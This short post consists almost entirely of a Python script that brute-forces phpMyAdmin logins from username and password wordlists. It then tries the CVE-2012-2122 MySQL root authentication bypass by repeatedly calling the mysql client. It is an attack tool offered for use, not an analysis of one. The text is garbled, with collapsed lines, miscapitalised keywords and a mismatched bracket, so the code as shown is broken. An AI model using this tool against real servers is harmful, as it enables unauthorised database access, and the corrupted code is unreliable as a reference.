phpMyAdmin brute force hack, plus cve-2012-2122 MySQL authentication Bypass vulnerability exploit.
#!/usr/bin/env pythonimport urllib Import urllib2 import cookielib import sysimport subprocessdef Crack (Url,username, Password): opener = Urllib2.build_opener (urllib2. Httpcookieprocessor (Cookielib. Lwpcookiejar ())) headers = {' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64) '}params = Urllib.urlencode ({' Pma_username ': username, ' Pma_password ': password}) request = Urllib2. Request (url+ "/index.php", params,headers) response = Opener.open (Request) A=response.read () If A.find (' Database Server ')!=-1 and A.find (' Name= "Login_form" ') ==-1:return Username,passwordreturn 0def Mysqlauthenticationbypasscheck (host,port): I=0while i<300:i=i+1subprocess. Popen ("MySQL--host=%s-p%s-uroot-piswin"% (Host,port), shell=true). Wait () if __name__ = = ' __main__ ': If Len (SYS.ARGV) &L T;4:print "#author: Iswin\n#useage python pma.py http://www.jb51.net/phpmyadmin/username.txt password.txt" Sys.exit () print "Bruting,pleas wait ..." for name in open (Sys.argv[2], "R"): for PASSW in Open (Sys.argv[3], "R"): State=crack (sys.argv[1],NAME,PASSW] If State!=0:print "\nbrute successful" print "UserName:" +state[0]+ "PassWord:" +state[1]sys.exit () Print "Sorry,brute failed...,try to use Mysqlauthenticationbypasscheck" choice=raw_input (' warning:this function needs MySQL environment.\ny:try to mysqlauthenticationbypasscheck\nothers:exit\n ') if choice== ' y ' or choice== ' y ': host=raw_ Input (' Host: ') port=raw_input (' Port: ') Mysqlauthenticationbypasscheck (Host,port)